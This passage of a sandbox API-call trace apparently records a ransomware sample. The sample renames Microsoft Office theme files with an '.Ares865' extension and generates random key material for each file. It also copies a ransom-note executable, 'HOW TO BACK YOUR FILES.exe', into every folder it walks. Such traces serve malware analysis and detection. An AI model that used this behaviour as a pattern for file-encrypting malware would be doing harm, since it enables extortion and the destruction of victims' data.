lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\slipstream.xml.ares865"), dwFlags=0x1) returned 1 [0074.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\slipstream.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.132] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=965) returned 1 [0074.132] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.133] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.133] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.135] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.136] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.136] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.136] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Solstice.xml" | out: lpString1="Solstice.xml") returned="Solstice.xml" [0074.136] lstrlenW (lpString="Solstice.xml") returned 12 [0074.136] lstrlenW (lpString="Ares865") returned 7 [0074.136] lstrcmpiW (lpString1="ice.xml", lpString2="Ares865") returned 1 [0074.137] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml.Ares865") returned 86 [0074.137] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\solstice.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\solstice.xml.ares865"), dwFlags=0x1) returned 1 [0074.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\solstice.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.139] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=963) returned 1 [0074.139] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.140] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.140] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.142] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.142] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.142] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.143] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Technic.xml" | out: lpString1="Technic.xml") returned="Technic.xml" [0074.143] lstrlenW (lpString="Technic.xml") returned 11 [0074.143] lstrlenW (lpString="Ares865") returned 7 [0074.143] lstrcmpiW (lpString1="nic.xml", lpString2="Ares865") returned 1 [0074.143] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml.Ares865") returned 85 [0074.143] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml.ares865"), dwFlags=0x1) returned 1 [0074.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.157] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=962) returned 1 [0074.162] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.163] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.163] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.165] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.166] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.166] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.166] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Thatch.xml" | out: lpString1="Thatch.xml") returned="Thatch.xml" [0074.166] lstrlenW (lpString="Thatch.xml") returned 10 [0074.166] lstrlenW (lpString="Ares865") returned 7 [0074.166] lstrcmpiW (lpString1="tch.xml", lpString2="Ares865") returned 1 [0074.166] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml.Ares865") returned 84 [0074.166] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml.ares865"), dwFlags=0x1) returned 1 [0074.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.167] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=961) returned 1 [0074.167] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.168] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.168] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.173] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0074.174] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.174] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.175] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Trek.xml" | out: lpString1="Trek.xml") returned="Trek.xml" [0074.175] lstrlenW (lpString="Trek.xml") returned 8 [0074.175] lstrlenW (lpString="Ares865") returned 7 [0074.175] lstrcmpiW (lpString1="rek.xml", lpString2="Ares865") returned 1 [0074.175] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml.Ares865") returned 82 [0074.175] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml.ares865"), dwFlags=0x1) returned 1 [0074.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.176] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=959) returned 1 [0074.176] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0074.177] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.177] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.179] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0074.179] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.179] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.180] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Urban.xml" | out: lpString1="Urban.xml") returned="Urban.xml" [0074.180] lstrlenW (lpString="Urban.xml") returned 9 [0074.180] lstrlenW (lpString="Ares865") returned 7 [0074.180] lstrcmpiW (lpString1="ban.xml", lpString2="Ares865") returned 1 [0074.180] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml.Ares865") returned 83 [0074.180] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml.ares865"), dwFlags=0x1) returned 1 [0074.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.181] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=960) returned 1 [0074.181] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0074.182] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.182] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.184] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0074.184] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.184] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.185] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Verve.xml" | out: lpString1="Verve.xml") returned="Verve.xml" [0074.185] lstrlenW (lpString="Verve.xml") returned 9 [0074.185] lstrlenW (lpString="Ares865") returned 7 [0074.185] lstrcmpiW (lpString1="rve.xml", lpString2="Ares865") returned 1 [0074.185] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml.Ares865") returned 83 [0074.185] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml.ares865"), dwFlags=0x1) returned 1 [0074.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.186] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=960) returned 1 [0074.186] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0074.187] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.187] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.189] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0074.190] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.190] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.190] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Waveform.xml" | out: lpString1="Waveform.xml") returned="Waveform.xml" [0074.190] lstrlenW (lpString="Waveform.xml") returned 12 [0074.190] lstrlenW (lpString="Ares865") returned 7 [0074.190] lstrcmpiW (lpString1="orm.xml", lpString2="Ares865") returned 1 [0074.190] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml.Ares865") returned 86 [0074.190] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml.ares865"), dwFlags=0x1) returned 1 [0074.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.191] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=963) returned 1 [0074.192] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0074.192] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.192] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.194] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0074.195] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.195] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.195] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\CLIPART", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\CLIPART") returned="C:\\Program Files\\Microsoft Office\\CLIPART" [0074.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0074.196] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0074.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART") returned 41 [0074.196] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\CLIPART" | out: lpString1="C:\\Program Files\\Microsoft Office\\CLIPART") returned="C:\\Program Files\\Microsoft Office\\CLIPART" [0074.196] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.196] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\clipart\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.200] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.200] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5dbabec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dbabec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.200] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.200] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.200] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="PUB60COR" | out: lpString1="PUB60COR") returned="PUB60COR" [0074.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0074.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x66) returned 0x2e4710 [0074.200] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7c70 | out: ListHead=0x2e77d0, ListEntry=0x2e7c70) returned 0x2e7c90 [0074.200] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0074.200] lstrcmpiW (lpString1="Publisher", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0074.200] lstrcmpiW (lpString1="Publisher", lpString2="aoldtz.exe") returned 1 [0074.200] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="Publisher" | out: lpString1="Publisher") returned="Publisher" [0074.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0074.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4780 [0074.201] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7c50 | out: ListHead=0x2e77d0, ListEntry=0x2e7c50) returned 0x2e7c70 [0074.201] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 0 [0074.201] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0074.201] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7c50 [0074.201] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher") returned="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher" [0074.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0074.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0074.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher") returned 51 [0074.201] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher" | out: lpString1="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher") returned="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher" [0074.201] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.201] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.205] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.205] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5dbabec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dbabec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.205] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.205] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.206] lstrcpyW (in: lpString1=0x2e2e8c8, lpString2="Backgrounds" | out: lpString1="Backgrounds") returned="Backgrounds" [0074.206] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0074.206] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2effc8 [0074.206] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7c50 | out: ListHead=0x2e77d0, ListEntry=0x2e7c50) returned 0x2e7c70 [0074.206] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbabec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5dbabec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0074.206] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0074.206] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbabec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5dbabec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0074.206] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0074.206] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7c50 [0074.206] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" [0074.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0074.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0074.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 63 [0074.206] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: lpString1="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" [0074.206] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.206] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 